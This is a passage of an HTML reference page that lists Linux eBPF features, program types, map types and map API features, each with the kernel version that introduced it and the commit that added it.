<tr><td><code>bpf()</code> syscall</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/99c55f7d47c0dc6fc64729f37bf435abf43f4c60"><code>99c55f7d47c0</code></a></td></tr>
|
||
<tr><td>Maps (<em>a.k.a.</em> Tables; details below)</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/99c55f7d47c0dc6fc64729f37bf435abf43f4c60"><code>99c55f7d47c0</code></a></td></tr>
|
||
<tr><td>BPF attached to sockets</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/89aa075832b0da4402acebd698d0411dcc82d03e"><code>89aa075832b0</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>kprobes</code></td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td></tr>
|
||
<tr><td><code>cls_bpf</code> / <code>act_bpf</code> for <code>tc</code></td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/e2e9b6541dd4b31848079da80fe2253daaafb549"><code>e2e9b6541dd4</code></a></td></tr>
|
||
<tr><td>Tail calls</td><td>4.2</td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td></tr>
|
||
<tr><td>Non-root programs on sockets</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/1be7f75d1668d6296b80bf35dcf6762393530afc"><code>1be7f75d1668</code></a></td></tr>
|
||
<tr><td>Persistent maps and programs (virtual FS)</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/b2197755b2633e164a439682fb05a9b5ea48f706"><code>b2197755b263</code></a></td></tr>
|
||
<tr><td><code>tc</code>'s <code>direct-action</code> (<code>da</code>) mode</td><td>4.4</td><td><a href="https://github.com/torvalds/linux/commit/045efa82ff563cd4e656ca1c2e354fa5bf6bbda4"><code>045efa82ff56</code></a></td></tr>
|
||
<tr><td><code>tc</code>'s <code>clsact</code> qdisc</td><td>4.5</td><td><a href="https://github.com/torvalds/linux/commit/1f211a1b929c804100e138c5d3d656992cfd5622"><code>1f211a1b929c</code></a></td></tr>
|
||
<tr><td>BPF attached to tracepoints</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce"><code>98b5c2c65c29</code></a></td></tr>
|
||
<tr><td>Direct packet access</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/969bf05eb3cedd5a8d4b7c346a85c2ede87a6d6d"><code>969bf05eb3ce</code></a></td></tr>
|
||
<tr><td>XDP (see below)</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>BPF attached to perf events</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/0515e5999a466dfe6e1924f460da599bb6821487"><code>0515e5999a46</code></a></td></tr>
|
||
<tr><td>Hardware offload for <code>tc</code>'s <code>cls_bpf</code></td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/332ae8e2f6ecda5e50c5c62ed62894963e3a83f5"><code>332ae8e2f6ec</code></a></td></tr>
|
||
<tr><td>Verifier exposure and internal hooks</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/13a27dfc669724564aafa2699976ee756029fed2"><code>13a27dfc6697</code></a></td></tr>
|
||
<tr><td>BPF attached to cgroups for socket filtering</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/0e33661de493db325435d565a4a722120ae4cbf3"><code>0e33661de493</code></a></td></tr>
|
||
<tr><td>Lightweight tunnel encapsulation</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td></tr>
|
||
<tr><td><strong>e</strong>BPF support for <code>xt_bpf</code> module (iptables)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/2c16d60332643e90d4fa244f4a706c454b8c7569"><code>2c16d6033264</code></a></td></tr>
|
||
<tr><td>BPF program tag</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/7bd509e311f408f7a5132fcdde2069af65fa05ae"><code>7bd509e311f4</code></a></td></tr>
|
||
<tr><td>Tracepoints to debug BPF</td><td>4.11 (removed in 4.18)</td><td><a href="https://github.com/torvalds/linux/commit/a67edbf4fb6deadcfe57a04a134abed4a5ba3bb5"><code>a67edbf4fb6d</code></a> <a href="https://github.com/torvalds/linux/commit/4d220ed0f8140c478ab7b0a14d96821da639b646"><code>4d220ed0f814</code></a></td></tr>
|
||
<tr><td>Testing / benchmarking BPF programs</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/1cf1cae963c2e6032aebe1637e995bc2f5d330f4"><code>1cf1cae963c2</code></a></td></tr>
|
||
<tr><td>BPF programs and maps IDs</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/dc4bb0e2356149aee4cdae061936f3bbdd45595c"><code>dc4bb0e23561</code></a></td></tr>
|
||
<tr><td>BPF support for <code>sock_ops</code></td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/40304b2a1567fecc321f640ee4239556dd0f3ee0"><code>40304b2a1567</code></a></td></tr>
|
||
<tr><td>BPF support for skbs on sockets</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/b005fd189cec9407b700599e1e80e0552446ee79"><code>b005fd189cec</code></a></td></tr>
|
||
<tr><td>bpftool utility in kernel sources</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/71bb428fe2c19512ac671d5ee16ef3e73e1b49a8"><code>71bb428fe2c1</code></a></td></tr>
|
||
<tr><td>BPF attached to cgroups as device controller</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ebc614f687369f9df99828572b1d85a7c2de3d92"><code>ebc614f68736</code></a></td></tr>
|
||
<tr><td>bpf2bpf function calls</td><td>4.16</td><td><a href="https://github.com/torvalds/linux/commit/cc8b0b92a1699bc32f7fec71daa2bfc90de43a4d"><code>cc8b0b92a169</code></a></td></tr>
|
||
<tr><td>BPF used for monitoring socket RX/TX data</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td></tr>
|
||
<tr><td>BPF attached to raw tracepoints</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c4f6699dfcb8558d138fe838f741b2c10f416cf9"><code>c4f6699dfcb8</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>bind()</code> system call</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4fbac77d2d092b475dda9eea66da674369665427"><code>4fbac77d2d09</code></a> <a href="https://github.com/torvalds/linux/commit/aac3fc320d9404f2665a8b1249dc3170d5fa3caf"><code>aac3fc320d94</code></a></td></tr>
|
||
<tr><td>BPF attached to <code>connect()</code> system call</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/d74bad4e74ee373787a9ae24197c17b7cdc428d5"><code>d74bad4e74ee</code></a></td></tr>
|
||
<tr><td>BPF Type Format (BTF)</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/69b693f0aefa0ed521e8bd02260523b5ae446ad7"><code>69b693f0aefa</code></a></td></tr>
|
||
<tr><td>AF_XDP</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/fbfc504a24f53f7ebe128ab55cb5dba634f4ece8"><code>fbfc504a24f5</code></a></td></tr>
|
||
<tr><td>bpfilter</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/d2ba09c17a0647f899d6c20a11bab9e6d3382f07"><code>d2ba09c17a06</code></a></td></tr>
|
||
<tr><td>End.BPF action for seg6local LWT</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/004d4b274e2a1a895a0e5dc66158b90a7d463d44"><code>004d4b274e2a</code></a></td></tr>
|
||
<tr><td>BPF attached to LIRC devices</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td>Pass map values to map helpers</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/d71962f3e627b5941804036755c844fabfb65ff5"><code>d71962f3e627</code></a></td></tr>
|
||
<tr><td>BPF socket reuseport</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td></tr>
|
||
<tr><td>BPF flow dissector</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/d58e468b1112dcd1d5193c0a89ff9f98b5a3e8b9"><code>d58e468b1112</code></a></td></tr>
|
||
<tr><td>BPF 1M insn limit</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/c04c0d2b968ac45d6ef020316808ef6c82325a82"><code>c04c0d2b968a</code></a></td></tr>
|
||
<tr><td>BPF cgroup sysctl</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/7b146cebe30cb481b0f70d85779da938da818637"><code>7b146cebe30c</code></a></td></tr>
|
||
<tr><td>BPF raw tracepoint writable</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/9df1c28bb75217b244257152ab7d788bb2a386d0"><code>9df1c28bb752</code></a></td></tr>
|
||
<tr><td>BPF bounded loop</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/2589726d12a1b12eaaa93c7f1ea64287e383c7a5"><code>2589726d12a1</code></a></td></tr>
|
||
<tr><td>BPF trampoline</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/fec56f5890d93fc2ed74166c397dc186b1c25951"><code>fec56f5890d9</code></a></td></tr>
|
||
<tr><td>BPF LSM hook</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/fc611f47f2188ade2b48ff6902d5cce8baac0c58"><code>fc611f47f218</code></a> <a href="https://github.com/torvalds/linux/commit/641cd7b06c911c5935c34f24850ea18690649917"><code>641cd7b06c91</code></a></td></tr>
|
||
<tr><td>BPF iterator</td><td>5.8</td><td><a href="https://github.com/torvalds/linux/commit/180139dca8b38c858027b8360ee10064fdb2fbf7"><code>180139dca8b3</code></a></td></tr>
|
||
<tr><td>BPF socket lookup hook</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/e9ddbb7707ff5891616240026062b8c1e29864ca"><code>e9ddbb7707ff</code></a></td></tr>
|
||
<tr><td>Sleepable BPF programs</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/1e6c62a8821557720a9b2ea9617359b264f2f67c"><code>1e6c62a88215</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h3 id="program-types"><a class="header" href="#program-types">Program types</a></h3>
|
||
<div class="table-wrapper"><table><thead><tr><th>Program type</th><th>Kernel version</th><th>Commit</th><th>Enum</th></tr></thead><tbody>
|
||
<tr><td>Socket filter</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/ddd872bc3098f9d9abe1680a6b2013e59e3337f7"><code>ddd872bc3098</code></a></td><td>BPF_PROG_TYPE_SOCKET_FILTER</td></tr>
|
||
<tr><td>Kprobe</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td><td>BPF_PROG_TYPE_KPROBE</td></tr>
|
||
<tr><td>traffic control (TC)</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/96be4325f443dbbfeb37d2a157675ac0736531a1"><code>96be4325f443</code></a></td><td>BPF_PROG_TYPE_SCHED_CLS</td></tr>
|
||
<tr><td>traffic control (TC)</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/94caee8c312d96522bcdae88791aaa9ebcd5f22c"><code>94caee8c312d</code></a></td><td>BPF_PROG_TYPE_SCHED_ACT</td></tr>
|
||
<tr><td>Tracepoint</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce"><code>98b5c2c65c29</code></a></td><td>BPF_PROG_TYPE_TRACEPOINT</td></tr>
|
||
<tr><td>XDP</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td><td>BPF_PROG_TYPE_XDP</td></tr>
|
||
<tr><td>Perf event</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/0515e5999a466dfe6e1924f460da599bb6821487"><code>0515e5999a46</code></a></td><td>BPF_PROG_TYPE_PERF_EVENT</td></tr>
|
||
<tr><td>cgroup socket filtering</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/0e33661de493db325435d565a4a722120ae4cbf3"><code>0e33661de493</code></a></td><td>BPF_PROG_TYPE_CGROUP_SKB</td></tr>
|
||
<tr><td>cgroup sock modification</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/61023658760032e97869b07d54be9681d2529e77"><code>610236587600</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCK</td></tr>
|
||
<tr><td>lightweight tunnel (IN)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_IN</td></tr>
|
||
<tr><td>lightweight tunnel (OUT)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_OUT</td></tr>
|
||
<tr><td>lightweight tunnel (XMIT)</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td><td>BPF_PROG_TYPE_LWT_XMIT</td></tr>
|
||
<tr><td>cgroup sock ops (per conn)</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/40304b2a1567fecc321f640ee4239556dd0f3ee0"><code>40304b2a1567</code></a></td><td>BPF_PROG_TYPE_SOCK_OPS</td></tr>
|
||
<tr><td>stream parser / stream verdict</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/b005fd189cec9407b700599e1e80e0552446ee79"><code>b005fd189cec</code></a></td><td>BPF_PROG_TYPE_SK_SKB</td></tr>
|
||
<tr><td>cgroup device manager</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ebc614f687369f9df99828572b1d85a7c2de3d92"><code>ebc614f68736</code></a></td><td>BPF_PROG_TYPE_CGROUP_DEVICE</td></tr>
|
||
<tr><td>socket msg verdict</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td><td>BPF_PROG_TYPE_SK_MSG</td></tr>
|
||
<tr><td>Raw tracepoint</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c4f6699dfcb8558d138fe838f741b2c10f416cf9"><code>c4f6699dfcb8</code></a></td><td>BPF_PROG_TYPE_RAW_TRACEPOINT</td></tr>
|
||
<tr><td>socket binding</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/4fbac77d2d092b475dda9eea66da674369665427"><code>4fbac77d2d09</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCK_ADDR</td></tr>
|
||
<tr><td>LWT seg6local</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/004d4b274e2a1a895a0e5dc66158b90a7d463d44"><code>004d4b274e2a</code></a></td><td>BPF_PROG_TYPE_LWT_SEG6LOCAL</td></tr>
|
||
<tr><td>lirc devices</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td><td>BPF_PROG_TYPE_LIRC_MODE2</td></tr>
|
||
<tr><td>lookup SO_REUSEPORT socket</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td><td>BPF_PROG_TYPE_SK_REUSEPORT</td></tr>
|
||
<tr><td>flow dissector</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/d58e468b1112dcd1d5193c0a89ff9f98b5a3e8b9"><code>d58e468b1112</code></a></td><td>BPF_PROG_TYPE_FLOW_DISSECTOR</td></tr>
|
||
<tr><td>cgroup sysctl</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/7b146cebe30cb481b0f70d85779da938da818637"><code>7b146cebe30c</code></a></td><td>BPF_PROG_TYPE_CGROUP_SYSCTL</td></tr>
|
||
<tr><td>writable raw tracepoints</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/9df1c28bb75217b244257152ab7d788bb2a386d0"><code>9df1c28bb752</code></a></td><td>BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE</td></tr>
|
||
<tr><td>cgroup getsockopt/setsockopt</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/0d01da6afc5402f60325c5da31b22f7d56689b49"><code>0d01da6afc54</code></a></td><td>BPF_PROG_TYPE_CGROUP_SOCKOPT</td></tr>
|
||
<tr><td>Tracing (BTF/BPF trampoline)</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/f1b9509c2fb0ef4db8d22dac9aef8e856a5d81f6"><code>f1b9509c2fb0</code></a></td><td>BPF_PROG_TYPE_TRACING</td></tr>
|
||
<tr><td>struct ops</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/27ae7997a66174cb8afd6a75b3989f5e0c1b9e5a"><code>27ae7997a661</code></a></td><td>BPF_PROG_TYPE_STRUCT_OPS</td></tr>
|
||
<tr><td>extensions</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/be8704ff07d2374bcc5c675526f95e70c6459683"><code>be8704ff07d2</code></a></td><td>BPF_PROG_TYPE_EXT</td></tr>
|
||
<tr><td>LSM</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/fc611f47f2188ade2b48ff6902d5cce8baac0c58"><code>fc611f47f218</code></a></td><td>BPF_PROG_TYPE_LSM</td></tr>
|
||
<tr><td>lookup listening socket</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/e9ddbb7707ff5891616240026062b8c1e29864ca"><code>e9ddbb7707ff</code></a></td><td>BPF_PROG_TYPE_SK_LOOKUP</td></tr>
|
||
<tr><td>Allow executing syscalls</td><td>5.15</td><td><a href="https://github.com/torvalds/linux/commit/79a7f8bdb159d9914b58740f3d31d602a6e4aca8"><code>79a7f8bdb159</code></a></td><td>BPF_PROG_TYPE_SYSCALL</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="maps-aka-tables-in-bcc-lingo"><a class="header" href="#maps-aka-tables-in-bcc-lingo">Maps (<em>a.k.a.</em> Tables, in BCC lingo)</a></h2>
|
||
<h3 id="map-types"><a class="header" href="#map-types">Map types</a></h3>
|
||
<p>The list of map types supported in your kernel can be found in file
|
||
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_map_type {' include/uapi/linux/bpf.h
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Map type</th><th>Kernel version</th><th>Commit</th><th>Enum</th></tr></thead><tbody>
|
||
<tr><td>Hash</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/0f8e4bd8a1fc8c4185f1630061d0a1f2d197a475"><code>0f8e4bd8a1fc</code></a></td><td>BPF_MAP_TYPE_HASH</td></tr>
|
||
<tr><td>Array</td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/28fbcfa08d8ed7c5a50d41a0433aad222835e8e3"><code>28fbcfa08d8e</code></a></td><td>BPF_MAP_TYPE_ARRAY</td></tr>
|
||
<tr><td>Prog array</td><td>4.2</td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td><td>BPF_MAP_TYPE_PROG_ARRAY</td></tr>
|
||
<tr><td>Perf events</td><td>4.3</td><td><a href="https://github.com/torvalds/linux/commit/ea317b267e9d03a8241893aa176fba7661d07579"><code>ea317b267e9d</code></a></td><td>BPF_MAP_TYPE_PERF_EVENT_ARRAY</td></tr>
|
||
<tr><td>Per-CPU hash</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/824bd0ce6c7c43a9e1e210abf124958e54d88342"><code>824bd0ce6c7c</code></a></td><td>BPF_MAP_TYPE_PERCPU_HASH</td></tr>
|
||
<tr><td>Per-CPU array</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/a10423b87a7eae75da79ce80a8d9475047a674ee"><code>a10423b87a7e</code></a></td><td>BPF_MAP_TYPE_PERCPU_ARRAY</td></tr>
|
||
<tr><td>Stack trace</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/d5a3b1f691865be576c2bffa708549b8cdccda19"><code>d5a3b1f69186</code></a></td><td>BPF_MAP_TYPE_STACK_TRACE</td></tr>
|
||
<tr><td>cgroup array</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/4ed8ec521ed57c4e207ad464ca0388776de74d4b"><code>4ed8ec521ed5</code></a></td><td>BPF_MAP_TYPE_CGROUP_ARRAY</td></tr>
|
||
<tr><td>LRU hash</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/29ba732acbeece1e34c68483d1ec1f3720fa1bb3"><code>29ba732acbee</code></a> <a href="https://github.com/torvalds/linux/commit/3a08c2fd763450a927d1130de078d6f9e74944fb"><code>3a08c2fd7634</code></a></td><td>BPF_MAP_TYPE_LRU_HASH</td></tr>
|
||
<tr><td>LRU per-CPU hash</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/8f8449384ec364ba2a654f11f94e754e4ff719e0"><code>8f8449384ec3</code></a> <a href="https://github.com/torvalds/linux/commit/961578b63474d13ad0e2f615fcc2901c5197dda6"><code>961578b63474</code></a></td><td>BPF_MAP_TYPE_LRU_PERCPU_HASH</td></tr>
|
||
<tr><td>LPM trie (longest-prefix match)</td><td>4.11</td><td><a href="https://github.com/torvalds/linux/commit/b95a5c4db09bc7c253636cb84dc9b12c577fd5a0"><code>b95a5c4db09b</code></a></td><td>BPF_MAP_TYPE_LPM_TRIE</td></tr>
|
||
<tr><td>Array of maps</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/56f668dfe00dcf086734f1c42ea999398fad6572"><code>56f668dfe00d</code></a></td><td>BPF_MAP_TYPE_ARRAY_OF_MAPS</td></tr>
|
||
<tr><td>Hash of maps</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/bcc6b1b7ebf857a9fe56202e2be3361131588c15"><code>bcc6b1b7ebf8</code></a></td><td>BPF_MAP_TYPE_HASH_OF_MAPS</td></tr>
|
||
<tr><td>Netdevice references (array)</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/546ac1ffb70d25b56c1126940e5ec639c4dd7413"><code>546ac1ffb70d</code></a></td><td>BPF_MAP_TYPE_DEVMAP</td></tr>
|
||
<tr><td>Socket references (array)</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td><td>BPF_MAP_TYPE_SOCKMAP</td></tr>
|
||
<tr><td>CPU references</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/6710e1126934d8b4372b4d2f9ae1646cd3f151bf"><code>6710e1126934</code></a></td><td>BPF_MAP_TYPE_CPUMAP</td></tr>
|
||
<tr><td>AF_XDP socket (XSK) references</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/fbfc504a24f53f7ebe128ab55cb5dba634f4ece8"><code>fbfc504a24f5</code></a></td><td>BPF_MAP_TYPE_XSKMAP</td></tr>
|
||
<tr><td>Socket references (hashmap)</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td><td>BPF_MAP_TYPE_SOCKHASH</td></tr>
|
||
<tr><td>cgroup storage</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/de9cbbaadba5adf88a19e46df61f7054000838f6"><code>de9cbbaadba5</code></a></td><td>BPF_MAP_TYPE_CGROUP_STORAGE</td></tr>
|
||
<tr><td>reuseport sockarray</td><td>4.19</td><td><a href="https://github.com/torvalds/linux/commit/5dc4c4b7d4e8115e7cde96a030f98cb3ab2e458c"><code>5dc4c4b7d4e8</code></a></td><td>BPF_MAP_TYPE_REUSEPORT_SOCKARRAY</td></tr>
|
||
<tr><td>precpu cgroup storage</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/b741f1630346defcbc8cc60f1a2bdae8b3b0036f"><code>b741f1630346</code></a></td><td>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</td></tr>
|
||
<tr><td>queue</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td><td>BPF_MAP_TYPE_QUEUE</td></tr>
|
||
<tr><td>stack</td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td><td>BPF_MAP_TYPE_STACK</td></tr>
|
||
<tr><td>socket local storage</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td><td>BPF_MAP_TYPE_SK_STORAGE</td></tr>
|
||
<tr><td>Netdevice references (hashmap)</td><td>5.4</td><td><a href="https://github.com/torvalds/linux/commit/6f9d451ab1a33728adb72d7ff66a7b374d665176"><code>6f9d451ab1a3</code></a></td><td>BPF_MAP_TYPE_DEVMAP_HASH</td></tr>
|
||
<tr><td>struct ops</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/85d33df357b634649ddbe0a20fd2d0fc5732c3cb"><code>85d33df357b6</code></a></td><td>BPF_MAP_TYPE_STRUCT_OPS</td></tr>
|
||
<tr><td>ring buffer</td><td>5.8</td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td><td>BPF_MAP_TYPE_RINGBUF</td></tr>
|
||
<tr><td>inode storage</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td><td>BPF_MAP_TYPE_INODE_STORAGE</td></tr>
|
||
<tr><td>task storage</td><td>5.11</td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td><td>BPF_MAP_TYPE_TASK_STORAGE</td></tr>
|
||
<tr><td>Bloom filter</td><td>5.16</td><td><a href="https://github.com/torvalds/linux/commit/9330986c03006ab1d33d243b7cfe598a7a3c1baa"><code>9330986c0300</code></a></td><td>BPF_MAP_TYPE_BLOOM_FILTER</td></tr>
|
||
<tr><td>user ringbuf</td><td>6.1</td><td><a href="https://github.com/torvalds/linux/commit/583c1f420173f7d84413a1a1fbf5109d798b4faa"><code>583c1f420173</code></a></td><td>BPF_MAP_TYPE_USER_RINGBUF</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h3 id="map-userspace-api"><a class="header" href="#map-userspace-api">Map userspace API</a></h3>
|
||
<p>Some (but not all) of these <em>API features</em> translate to a subcommand beginning with <code>BPF_MAP_</code>.
|
||
The list of subcommands supported in your kernel can be found in file
|
||
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_cmd {' include/uapi/linux/bpf.h
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>Basic operations (lookup, update, delete, <code>GET_NEXT_KEY</code>)</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/db20fd2b01087bdfbe30bce314a198eefedcc42e"><code>db20fd2b0108</code></a></td></tr>
|
||
<tr><td>Pass flags to <code>UPDATE_ELEM</code></td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/3274f52073d88b62f3c5ace82ae9d48546232e72"><code>3274f52073d8</code></a></td></tr>
|
||
<tr><td>Pre-alloc map memory by default</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/6c90598174322b8888029e40dd84a4eb01f56afe"><code>6c9059817432</code></a></td></tr>
|
||
<tr><td>Pass <code>NULL</code> to <code>GET_NEXT_KEY</code></td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/8fe45924387be6b5c1be59a7eb330790c61d5d10"><code>8fe45924387b</code></a></td></tr>
|
||
<tr><td>Creation: select NUMA node</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/96eabe7a40aa17e613cf3db2c742ee8b1fc764d0"><code>96eabe7a40aa</code></a></td></tr>
|
||
<tr><td>Restrict access from syscall side</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/6e71b04a82248ccf13a94b85cbc674a9fefe53f5"><code>6e71b04a8224</code></a></td></tr>
|
||
<tr><td>Creation: specify map name</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ad5b177bd73f5107d97c36f56395c4281fb6f089"><code>ad5b177bd73f</code></a></td></tr>
|
||
